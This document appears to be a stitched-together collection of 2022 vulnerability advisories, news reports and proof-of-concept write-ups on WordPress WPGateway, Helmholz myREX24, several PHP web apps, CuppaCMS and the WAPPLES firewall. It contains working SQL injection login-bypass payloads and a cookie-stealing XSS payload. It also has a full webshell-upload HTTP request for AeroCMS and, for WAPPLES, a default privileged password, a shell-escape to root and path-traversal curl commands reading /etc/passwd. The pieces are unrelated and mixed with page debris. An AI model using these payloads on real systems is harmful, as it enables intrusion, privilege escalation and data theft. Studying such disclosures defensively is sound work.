WordPress WPGateway plugin versions 3.5 and below suffer from an unauthenticated privilege escalation vulnerability.

    Description: Unauthenticated Privilege EscalationAffected Plugin: WPGatewayPlugin Slug: wpgatewayPlugin Developer: Jack Hopman/WPGatewayAffected Versions: <= 3.5CVE ID: CVE-2022-3180CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HFully Patched Version: N/AThe WPGateway plugin is a premium plugin tied to the WPGateway cloud service, which offers its users a way to setup and manage WordPress sites from a single dashboard. Part of the plugin functionality exposes a vulnerability that allows unauthenticated attackers to insert a malicious administrator.We obtained a current copy of the plugin on September 9, 2022, and determined that it is vulnerable, at which time we contacted the plugin vendor with our initial disclosure. We have reserved vulnerability identifier CVE-2022-3180 for this issue.As this is an actively exploited zero-day vulnerability, and attackers are already aware of the mechanism required to exploit it, we are releasing this public service announcement (PSA) to all of our users. We are intentionally withholding certain details to prevent further exploitation. As a reminder, an attacker with administrator privileges has effectively achieved a complete site takeover.Indicators of compromiseIf you are working to determine whether a site has been compromised using this vulnerability, the most common indicator of compromise is a malicious administrator with the username of rangex.If you see this user added to your dashboard, it means that your site has been compromised.Additionally, you can check your site’s access logs for requests to //wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1If these requests are present in your logs, they indicate that your site has been attacked using an exploit targeting this vulnerability, but do not necessarily indicate that it has been successfully compromised.ConclusionIn today’s post, we detailed a zero-day vulnerability being actively exploited in the WPGateway plugin.Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule on September 8, 2022, protecting against this vulnerability, while sites still using the free version of Wordfence will receive the same protection 30 days later, on October 8, 2022.If you have the WPGateway plugin installed, we urge you to remove it immediately until a patch is made available and to check for malicious administrator users in your WordPress dashboard.If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected, as this is a serious vulnerability that is actively being exploited in the wild. Please help make the WordPress community aware of this issue.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.Our investigation is ongoing, and we will provide more information in an additional blog post when it becomes available.Special thanks to Threat Intelligence Lead Chloe Chamberland for spotting this exploit in the wild.

WordPress WPGateway 3.5 Privilege Escalation

A remote, unauthenticated attacker can enumerate valid users by sending specific requests to the webservice of MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2.

2022-09-07 12:56 (CEST) VDE-2022-039  

**Helmholz: Multiple vulnerabilites in myREX24 and myREX24.virtual**  
Share: Email | Twitter  

**

Published

**

2022-09-07 12:56 (CEST)

**

Last update

**

2022-09-07 12:56 (CEST)

**Vendor(s)**

Helmholz GmbH & Co. KG  

**Product(s)**

Article No°

Product Name

Affected Version(s)

myREX24

<= 2.11.2

myREX24.virtual

<= 2.11.2

**

Summary

**

Multiple vulnerabilities have been found in myREX24 and myREX24.virtual. 

**

Vulnerabilities

**

**Weakness**

Improper Restriction of Excessive Authentication Attempts (CWE-307)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. The login pages bruteforce detection is disabled by default._

**Weakness**

Use of Hard-coded Credentials (CWE-798)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. The software uses a secure password for database access, but this password is shared across instances._

**Weakness**

Improper Privilege Management (CWE-269)

**Summary**

_An issue was discovered in the MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 software in all versions through 2.6.1. There is a local privilege escalation from the www-data account to the ..._

**Summary**

_An unauthenticated user can enumerate valid users by checking what kind of response the server sends._

**Weakness**

Server-Side Request Forgery (SSRF) (CWE-918)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an SSRF in thein the MySQL access check, allowing an attacker to scan for open ..._

**Weakness**

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (CWE-74)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an outdated and unused component allowing for malicious user input of active code._

**Weakness**

Improper Privilege Management (CWE-269)

**Summary**

_An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2._

**Weakness**

Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 software in all versions through 2.6.2. Inproper use of access validation allows a logged in user to see devices ..._

**Weakness**

Improper Privilege Management (CWE-269)

**Summary**

_An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2._

**Weakness**

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is a self XSS issue with a crafted cookie in the login page._

**Weakness**

URL Redirection to Untrusted Site ('Open Redirect') (CWE-601)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an unauthenticated open redirect in the redirect.php._

**Weakness**

Server-Side Request Forgery (SSRF) (CWE-918)

**Summary**

_An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2_ 

**Weakness**

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an incomplete XSS filter allowing an attacker to inject crafted malicious code into the page._

**Weakness**

Server-Side Request Forgery (SSRF) (CWE-918)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an SSRF in the HA module allowing an unauthenticated attacker to scan for open ports._

**Weakness**

Direct Request ('Forced Browsing') (CWE-425)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. An unauthenticated attacker is able to access files (that should have been restricted) via forceful browsing._

**Weakness**

Use of Incorrectly-Resolved Name or Reference (CWE-706)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. An attacker can read arbitrary JSON files via Local File Inclusion._

**Weakness**

Incorrect Resource Transfer Between Spheres (CWE-669)

**Summary**

_An authenticated attacker can change the password of his account into a new password that violates the password policy by intercepting and modifying the request that is send to the ..._

**Weakness**

Uncontrolled Resource Consumption (CWE-400)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an unused function that allows an authenticated attacker to use up all available IPs of ..._

**Weakness**

Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. An incomplete filter applied to a database response allows an authenticated attacker to gain non-public information about ..._

**Weakness**

Cross-site Scripting (XSS) (CWE-79)

**Summary**

_An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2._

**

Impact

**

please see cve id entries

**

Solution

**

****CVE-2020-35557, CVE-2020-35570, CVE-2020-35558,  
CVE-2020-35566, CVE-2020-12527, **CVE-2020-35568**:**** Update to version 2.12.1

**CVE-2020-12528,** **CVE-2020-12529,** **CVE-2020-35560,  
CVE-2020-12530, CVE-2020-35563,** **CVE-2020-35564,  
CVE-2020-35569,** **CVE-2020-35559,**  Update to version >= 2.7.1

**CVE-2020-10384**: Update to version 2.6.2 to close any known way to get to www-data.  
Note: This issue only exists up until version 2.6.1 and has already been addressed in >= 2.6.2

**CVE-2020-35567**: None  
Note: A proper fix for the underlying issue will come with a future architectural core-system-update.

**CVE-2020-35565**: None  
Mitigation: Activate bruteforce detection via Security → Fail2Ban → WebLogin  
Note: A proper fix for the underlying issue will come with a future architectural core-system-update. To further increase the security level of your account enable MFA.

**CVE-2020-35561**: Update to version 2.12.1

**

Reported by

**

OTORIO reported the vulnerabilities to MB connect line.

MB connect line reported the vulnerabilities to Helmholz.

CERT@VDE coordinated.

CVE-2022-22520: VDE-2022-039 | CERT@VDE

Hospital Information System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Permalink

Cannot retrieve contributors at this time

**CVE-2022-36669**

    # Exploit Title: Hospital Information System - SQL Injection via login page
    # Date: 25/07/2022
    # Exploit Author: saitamang
    # Vendor Homepage: https://code-projects.org
    # Software Link: https://download-media.code-projects.org/2019/11/HOSPITAL_INFORMATION_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip
    # Version: 1.0
    # Tested on: Centos 7 apache2 + MySQL
    

Other refrence --> https://packetstormsecurity.com/files/167803/Hospital-Information-System-1.0-SQL-Injection.html

From the login page, at the email form, the attacker may fill anything inside. On the password form, the attacker may used below payload and click login to successfully login as Admin functionality.

Payload --> 'or 1=1#

**Login bypass using normal SQLI payload**

**Login bypass with Sleep validation**

**Checking length of column**

##You may download script automation to get the database name for your reference to learn!

Download here

CVE-2022-36669: POC-DUMP/README.md at main · saitamang/POC-DUMP

Loan Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

Permalink

**Loan Management System**

Loan Management System suffers from severals vulnerabilities which is SQL Injection and Stored Cross Site Scripting (XSS).

**CVE-2022-37138****1\. SQL Injection**

    # Exploit Title: Loan Management System - SQL Injection via login page
    # Date: 28/07/2022
    # Exploit Author: saitamang
    # Vendor Homepage: sourcecodester
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip
    # Version: 1.0
    # Tested on: Centos 7 apache2 + MySQL
    

The attack vector for the SQL Injection happened at the login page. The login can be bypass using the boolean payload below to gain access as Admin as the highest privileges.

Payload --> 'or 2=2#

The python script to get the database name from SQL Injection Vulnerability can be access here.

**CVE-2022-37139****2\. Stored Cross Site Scripting**

    # Exploit Title: Loan Management System - XSS Stored
    # Date: 28/07/2022
    # Exploit Author: saitamang
    # Vendor Homepage: sourcecodester
    # Software Link:
    https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip
    # Version: 1.0
    # Tested on: Centos 7 apache2 + MySQL
    

There are several functions and parameter affected as below:

    addUser.php
    - firstname
    - lastname
    
    save_ltype.php
    - ltype_name
    - ltype_desc
    
    save_borrower.php
    - firstname
    - middlename
    - lastname
    - address
    

The payload use to inject is "/><svg/onload=alert(document.cookie)>

CVE-2022-37139: POC-DUMP/README.md at main · saitamang/POC-DUMP

Categories: News
Tags: WPGateway

Tags:  WordPress

Tags:  plugin

Tags:  vulnerability

Tags:  CVE

We take a look at a vulnerability being exploited in the wild related to the WPGateway WordPress plugin.



(Read more...)




The post WPGateway WordPress plugin vulnerability could allow full site takeover appeared first on Malwarebytes Labs.

There’s been a few WordPress plugin vulnerabilities in the wild recently, and today we have another one to add to the list. Sometimes when word breaks of a WordPress plugin issue, a fix is already available and all you have to do is perform an update. On other occasions, the attack is live and out there doing damage with no fix yet available. Sadly, this current exploit is an example of the latter.

WPGateway allows WordPress users to run WordPress sites from one dashboard. Unfortunately, research shows that part of this functionality puts both the site and the site’s users at risk.

**Beware of rogue admins**

The issue in question allows unauthenticated individuals to add rogue users to the site. Those unauthorised users have full admin privileges, which essentially results in a full site takeover thanks to the plugin.

At this point, the compromiser can do what they want with the hijacked website. They are in full control, which is not a great situation for anybody. The vulnerability is listed on the Common Vulnerabilities and Exposures site as CVE-2022-3180. However, no additional information is forthcoming yet as the page has merely been reserved at this point.

**Active exploitation**

The issue was first discovered on September 8, and is being actively exploited. There is very little additional information to go on at this point, as the specifics of the vulnerability are being withheld. As a result, people will largely be reliant on the WPGateway team to get a patch put together.

**Detecting and avoiding compromise**

Options are limited, but for now the main advice from Wordfence is this:

*   Remove the plugin installation until a patch is made available.
    
*   Check for malicious admin accounts in your WordPress dashboard. The username  “rangex” is a common indicator of compromise.
    

You can also check site access logs for requests to: //wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp\_new\_credentials=1. This indicates an attack attempt was made, but does not mean your site has been compromised. This is why checking for the “rangex” username is so important. Fingers crossed that this issue will receive a speedy patch from the plugin developers.

Stay safe out there!

WPGateway WordPress plugin vulnerability could allow full site takeover

A zero-day flaw in the latest version of a WordPress premium plugin known as WPGateway is being actively exploited in the wild, potentially allowing malicious actors to completely take over affected sites.
Tracked as CVE-2022-3180 (CVSS score: 9.8), the issue is being weaponized to add a malicious administrator user to sites running the WPGateway plugin, WordPress security company Wordfence

A zero-day flaw in the latest version of a WordPress premium plugin known as WPGateway is being actively exploited in the wild, potentially allowing malicious actors to completely take over affected sites.

Tracked as **CVE-2022-3180** (CVSS score: 9.8), the issue is being weaponized to add a malicious administrator user to sites running the WPGateway plugin, WordPress security company Wordfence noted.

"Part of the plugin functionality exposes a vulnerability that allows unauthenticated attackers to insert a malicious administrator," Wordfence researcher Ram Gall said in an advisory.

WPGateway is billed as a means for site administrators to install, backup, and clone WordPress plugins and themes from a unified dashboard.

The most common indicator that a website running the plugin has been compromised is the presence of an administrator with the username "rangex."

Additionally, the appearance of requests to "//wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp\_new\_credentials=1" in the access logs is a sign that the WordPress site has been targeted using the flaw, although it doesn't necessarily imply a successful breach.

Wordfence said it blocked over 4.6 million attacks attempting to take advantage of the vulnerability against more than 280,000 sites in the past 30 days.

Further details about the vulnerability have been withheld owing to active exploitation and to prevent other actors from taking advantage of the shortcoming. In the absence of a patch, users are recommended to remove the plugin from their WordPress installations until a fix is available.

The development comes days after Wordfence warned of in-the-wild abuse of another zero-day flaw in a WordPress plugin called BackupBuddy.

The disclosure also arrives as Sansec revealed that threat actors broke into the extension license system of FishPig, a vendor of popular Magento-WordPress integrations, to inject malicious code that's designed to install a remote access trojan called Rekoobe.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Over 280,000 WordPress Sites Attacked Using WPGateway Plugin Zero-Day Vulnerability

AeroCMS v0.0.1 was discovered to contain an arbitrary file upload vulnerability via the component /admin/profile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Hello I want to report an arbitrary file upload vulnerability that I found in AeroCms v0.0.1, through which we can upload webshell and control the web server.

**Step to Reproduct**

After entering the background of website management, click "Profile" to enter the interface of "/admin/profile. PHP", and you can see that the function of uploading pictures exists.  

We create a new webshell file and name it shell.php ：

<?php phpinfo(); ?>

Next, we select the file and click "Updae Profile" to upload the file  

When upload success access **'/images/shell.php'**

**We can see that the file was successfully uploaded and executed**

**Vulnerable Code**

**No file checking before uploading**

**POC**

**Injection Point**

> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_image"; filename="shell.php"  
> Content-Type: image/jpeg

**Request**

> POST /admin/profile.php HTTP/1.1  
> Host: 127.0.0.1:8080  
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8  
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
> Accept-Encoding: gzip, deflate  
> Content-Type: multipart/form-data; boundary=---------------------------423983190532431556521178267050  
> Content-Length: 1109  
> Origin: http://127.0.0.1:8080  
> Connection: close  
> Referer: http://127.0.0.1:8080/admin/profile.php  
> Cookie: PHPSESSID=dh3hq98sqsj0eapgn43efegfb3  
> Upgrade-Insecure-Requests: 1
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="username"
> 
> 1111  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="password"
> 
> 123.com  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_firstname"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_lastname"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_email"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_image"; filename="shell.php"  
> Content-Type: image/jpeg
> 
> test is test
> 
> <?php phpinfo();?>  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_role"
> 
> Subscriber  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="update\_user"
> 
> Update Profile  
> \-----------------------------423983190532431556521178267050--

**response**

> HTTP/1.1 200 OK  
> Date: Wed, 10 Aug 2022 02:45:01 GMT  
> Server: Apache/2.4.10 (Debian)  
> Expires: Thu, 19 Nov 1981 08:52:00 GMT  
> Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
> Pragma: no-cache  
> Vary: Accept-Encoding  
> Content-Length: 8474  
> Connection: close  
> Content-Type: text/html; charset=UTF-8
> 
>     <meta charset="utf-8">
>     <meta http-equiv="X-UA-Compatible" content="IE=edge">
>     <meta name="viewport" content="width=device-width, initial-scale=1">
>     <meta name="description" content="">
>     <meta name="author" content="">
>     
>     <title>AeroCMS Admin Panel</title>
>     
>     
>     <link href="css/bootstrap.min.css" rel="stylesheet">
>     
>     
>     <link href="css/sb-admin.css" rel="stylesheet">
>     
>     
>     <link href="font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
>     
>     
>     
>     
>     
>     <link rel="stylesheet" href="css/styles.css">
>     
>     <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
>     
>     <script src="https://cloud.tinymce.com/stable/tinymce.min.js"></script>
>     
>     <script src="js/jquery.js"></script>
>     
> 
>     <div id="wrapper">
>     
>         
>         <nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
>             
>             <div class="navbar-header">
>                 <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
>                     <span class="sr-only">Toggle navigation</span>
>                     <span class="icon-bar"></span>
>                     <span class="icon-bar"></span>
>                     <span class="icon-bar"></span>
>                 </button>
>                 <a class="navbar-brand" href="index.php">AeroCMS</a>
>             </div>
>             
>             <ul class="nav navbar-right top-nav">
>                 
>                 <li><a href='#'>Users Online: <span class="usersonline"></span></a></li>
>                 <li><a href="../index.php">View Site</a></li>
>                 
>                 <li class="dropdown">
>                     <a href="#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-user"></i>  <b class="caret"></b></a>
>                     <ul class="dropdown-menu">
>                         <li>
>                             <a href="#"><i class="fa fa-fw fa-user"></i> Profile</a>
>                         </li>
>                         <li class="divider"></li>
>                         <li>
>                             <a href="../includes/logout.php"><i class="fa fa-fw fa-power-off"></i> Log Out</a>
>                         </li>
>                     </ul>
>                 </li>
>             </ul>
>             
>             <div class="collapse navbar-collapse navbar-ex1-collapse">
>                 <ul class="nav navbar-nav side-nav">
>                     <li>
>                         <a href="index.php"><i class="fa fa-fw fa-dashboard"></i> Dashboard</a>
>                     </li>
>                     
>                     <li>
>                         <a href="javascript:;" data-toggle="collapse" data-target="#posts_dropdown"><i class="fa fa-fw fa-arrows-v"></i> Posts <i class="fa fa-fw fa-caret-down"></i></a>
>                         <ul id="posts_dropdown" class="collapse">
>                             <li>
>                                 <a href="./posts.php">View All Posts</a>
>                             </li>
>                             <li>
>                                 <a href="./posts.php?source=add_post">Add Posts</a>
>                             </li>
>                         </ul>
>                     </li>
>     
>                     <li>
>                         <a href="./categories.php"><i class="fa fa-fw fa-wrench"></i> Categories</a>
>                     </li>
>     
>                     <li>
>                         <a href="./comments.php"><i class="fa fa-fw fa-file"></i> Comments</a>
>                     </li>
>                     <li>
>                         <a href="javascript:;" data-toggle="collapse" data-target="#users"><i class="fa fa-fw fa-arrows-v"></i> Users <i class="fa fa-fw fa-caret-down"></i></a>
>                         <ul id="users" class="collapse">
>                             <li>
>                                 <a href="./users.php">View All Users</a>
>                             </li>
>                             <li>
>                                 <a href="./users.php?source=add_user">Add User</a>
>                             </li>
>                         </ul>
>                     </li>
>                     <li>
>                         <a href="./profile.php"><i class="fa fa-fw fa-file"></i> Profile</a>
>                     </li>
>                 </ul>
>             </div>
>             
>         </nav>
>     
>         <div id="page-wrapper">
>     
>             <div class="container-fluid">
>     
>                 
>                 <div class="row">
>                     <div class="col-lg-12">
>                         <h1 class="page-header">
>                             Welcome to the Admin Panel,
>                             <small>!</small>
>                         </h1>
>     
>                         <form action="" method="post" enctype="multipart/form-data">
>     
>                             <div class="form-group">
>                                     <label for="username">Username</label>
>                                     <input type="text" name="username" value="1111" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                     <label for="password">Password</label>
>                                     <input type="password" name="password" value="123.com" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_firstname">Firstname</label>
>                                 <input type="text" name="user_firstname" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_lastname">Lastname</label>
>                                 <input type="text" name="user_lastname" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_email">Email</label>
>                                 <input type="email" name="user_email" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_image">Image</label>
>                                 <img class="img-responsive" width="200" src="../images/test2.php" alt="">
>                                 <input type="file" name="user_image" class="form-control">
>                             </div>
>     
>     
>                             <div class="form-group">
>                                 <select name="user_role" class="form-control">
>                                     <option value="Subscriber">Subscriber</option>
>                                 
>                                 <option value='Admin'>Admin</option>                                    
>                                     
>                                     
>                                 </select>
>     
>                             </div>
>     
>                             <div class="form-group">
>                                 <input type="submit" value="Update Profile" name="update_user" class="btn btn-primary">
>                             </div>
>     
>                         </form>
>     
>     
>                     </div>
>                 </div>
>                 
>     
>             </div>
>             
>     
>         </div>
>         
>     
>     </div>
>     
>     
> 
> <script src="js/scripts.js"></script>

**I hope you can fix this vulnerability as soon as possible. I will report this vulnerability to CVE. Looking forward to your reply**

CVE-2022-38305: An arbitrary file upload vulnerability was found · Issue #3 · MegaTKC/AeroCMS

The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-37191: Authenticated Local File Inclusion vulnerability in cuppa api.  · Issue #20 · CuppaCMS/CuppaCMS

CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php.

CVE-2022-37190: Authenticated Remote Code Execution in CuppaCMS api · Issue #22 · CuppaCMS/CuppaCMS

Penta Security Systems Inc WAPPLES 4.0.*, 5.0.0.*, 5.0.12.* are vulnerable to Incorrect Access Control. The operating system that WAPPLES runs on has a built-in non-privileged user penta with a predefined password. The password for this user, as well as its existence, is not disclosed in the documentation. Knowing the credentials, attackers can use this feature to gain uncontrolled access to the device and therefore are considered an undocumented possibility for remote control.

**TL:DR**

Find out how multiple vulnerabilities in WAPPLES WAF allow an attacker to run arbitrary commands on the device with root privileges as well as access the device with privileges via a backdoor account.

**Vulnerability Summary**

WAPPLES — “logical web application firewall” by Penta Security Systems Inc. founded in South Korea in 1997. Comes as a hardware appliance and a virtual machine. According to Shodan, it is most common in Korea and Japan.

In versions from 4.0 to 6.0, there are a number of vulnerabilities that allow a remote attacker to execute arbitrary code, obtain confidential information using predefined credentials that are not described in the user manual, as well as the use of vulnerable components. And also escalate user privileges to root in versions 5.0 and 6.0.

****CVE list****

CVE-2022-24706, CVE-2022-31322, CVE-2022-35413, CVE-2022-31324, CVE-2022-35582

**Vulnerability Analysis****Foreword**

The vendor assured me that patches or mitigations are ready for all the problems found. And customers are already receiving updates.

I also want to thank Hyeon Jae Jang of Cloudbric Corp. for his professional approach

**Duplicate Web-UI certificate and SSH host keys**

All WAPPLES instances found on shodan.io, as well as my local copies, had a pre-generated self-signed certificate for the web interface installed. Using a self-signed certificate is already a security risk, but the decision is up to the user.

ssl.cert.fingerprint:017b7408f0aa8da17c47c9fe326577df66ad7f78

Using the same certificate and private key on all installed copies carries additional risks for a Man-in-the-middle attack, since it costs nothing for an attacker to get a copy of the private key and the administrator will not notice the catch.

WAPPLES Web-UI certificate on Shodan

Duplicate ssh host keys are also a common problem among device and software manufacturers and WAPPLES is no exception. Digging in Shodan, I noticed the same SSH fingerprints in some instances belong to several cloud providers.

c9:63:8c:04:79:87:72:c8:96:c8:6a:92:6f:63:a3:d4

Most of the hosts are located in the Linode cloud.

**How to fix?  
**For a Web-UI certificate, simply generate a new self-signed certificate, or better yet, either buy a trusted certificate and install it through the WAPPLES management console.

For SSH, remove keys and reconfigure ssh-server if you have access to the root shell. If not, you might use the vulnerabilities below 😉

\# rm /etc/ssh/ssh\_host\_\*  
\# dpkg-reconfigure openssh-server  
\# service sshd restart

**Hidden Functionality (Backdoor)**

The operating system that WAPPLES runs on has a built-in non-privileged user “penta” with a predefined password. The password for this user, as well as its existence, is not disclosed in the documentation. Knowing the credentials, attackers can use this feature to gain uncontrolled access to the device and therefore are considered an undocumented possibility for remote control.

The password is revealed in the system script and differs for different versions of the product. For security reasons, I will not publish the found passwords, but having a copy of the program, it will not be difficult to get them. Since the vendor no longer supports these versions, I highly recommend upgrading.

For version 5.0.12.\* attacker can escalate privileges via vulnerability described below.

**How to fix it?  
**Update to the latest supported version.

_Vulnerable versions: 4.0.\*, 5.0.0.\*, 5.0.12.\*  
CVE-ID: CVE-2022–35582_

**Remote command execution**

WAPPLES uses a vulnerable CouchDB version in default configuration that leads to remote OS command execution. To exploit this vulnerability the attacker must have access to the management interface. An attacker could gain unprivileged access to a system as a “couchdb” user, then escalate privileges using the other vulnerabilities described in this document.

You can read more about the exploitation and remediation of this vulnerability in my write-up about CouchDB vuln.

**How to fix it?  
**Contact the vendor for a patch and block all unnecessary ports using built-in firewall or look at the link above.

_Vulnerable versions: 6.0.4.\*, 6.0.6.\*  
CVE-2022–24706_

**Local privilege escalation**

Built-in utilities for moving files with SUID flag allow an unprivileged user to overwrite any file on behalf of the superuser.

Local unprivileged users are able to overwrite any file on behalf of the superuser. Which can lead to privilege escalation, such as adding permissions to use sudo without a password to the /etc/sudoers.d/ directory.

For version 6.0.\* this is:

/opt/penta/wapples/bin/conf\_mover  
/opt/penta/data2/backup/wapples\_integrity/bin/conf\_mover

For version 5.0.12.\* this is:

/opt/penta/wapples/bin/confMover  
/opt/penta/backup/wapples\_integrity/bin/confMover

**Exploitation example**

When launched, the conf_mover utility helpfully tells us how to use it:

First, let’s try on an empty file. The example below shows that the unprivileged user _penta_ copied the file as root:

It is also possible to copy files accessible only to the superuser:

**How to fix it?  
**Contact the vendor for a patch or mitigation.

_Vulnerable versions: 5.0.12.\*, 6.0.\*  
CVE-2022–31322_

**Shell escape privilege escalation**

I’m still not sure if the vendor provides access to the bash interpreter, so I can’t say the issues below are a vulnerability. Nevertheless, I will describe them, because such use of the configurator shell was most likely not intended.

Wapples CLI provides access to a limited subset of standart linux system commands without the ability to launch a bash/sh shell, however the arguments to these commands are not filtered well enough for meta-character content like &, `, $ etc.

**Obtaining an interactive shell with superuser rights from the “wapples” CLI section**

Login as _pentasec_ user and enter the _enable_ command to access privileged CLI mode, default password is “Penta@1997”.

Enter to the _wapples_ section and run one of the predefined commands with adding & bash to the end as command argument. You can see the list of commands by typing ? instead of command, e.g command ?

And now you are **root**:

**How to fix it?  
**Contact the vendor for a patch or mitigation.

_Vulnerable versions: 6.0.\*  
CVE-ID:none_

**Hardcoded credentials for Web-API**

The predefined system account, which is not available for modification and viewing by standard ways, is present in the WAPPLES version 4, 5 and 6. Credentials are used in some system scripts.

The account can only be seen in the CouchDB database by connecting to it directly.

Credentials can be used only in API requests for the endpoint https://<MGMT_IP>[:5001]/webapi/. The list of API requests with examples can be viewed at https://<MGMT_IP>[:5001]/docs/.

There are many interesting things, such as user management, backup settings, SSL certificates and much more.

For example, with such a request, you can get the password from the SMTP account:

**How to fix it?  
**Versions 4 and 5 need to be updated as they are no longer supported. For the version 6, you need to get a fix from the vendor.

_Vulnerable versions: 4.0.\* (>=4.0.54.1), 5.0.\*, 6.0.\*  
CVE-2022–35413_

**Web-API arbitrary fIle download (authenticated)**

Another way to download an arbitrary file, this time through the API. In this case, you can use the hard coded _systemi_ account described above, so in fact, this is an unauthenticated arbitrary fIle download.

$ curl -k -b 'WP\_SESSID=<SESSIONID>' --url \\  
'https://<MGT\_IP>/webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db\_backup'

**How to fix it?  
**And again, versions 4 and 5 need to be updated as they are no longer supported. For the version 6, you need to get a fix from the vendor.

_Vulnerable versions: 4.0.\* (>=4.0.54.1), 5.0.\*, 6.0.\*  
CVE-ID: none_

**Web-UI arbitrary file download (authenticated)**

An arbitrary file download vulnerability in the downloadAction() function allows attackers to download arbitrary files via a crafted POST request.

An authenticated user can download an arbitrary file by sending a POST request with the file name in the file_name parameter via the link https://MGMT_IP/report/download.

$ curl -k -X POST 'https://<MGMT\_IP>:5001/report/download'  \\  
\--header 'Cookie: PHPSESSID=<SESSION\_ID>'  \\  
\--data-urlencode 'file\_name=../../../../../../etc/passwd'

**How to fix it?  
**Versions 4 and 5 need to be updated as they are no longer supported. For the version 6, you need to get a fix from the vendor.

_Vulnerable versions: 4?, 5?, 6.0.\*  
CVE-2022–31324_

Tag

#php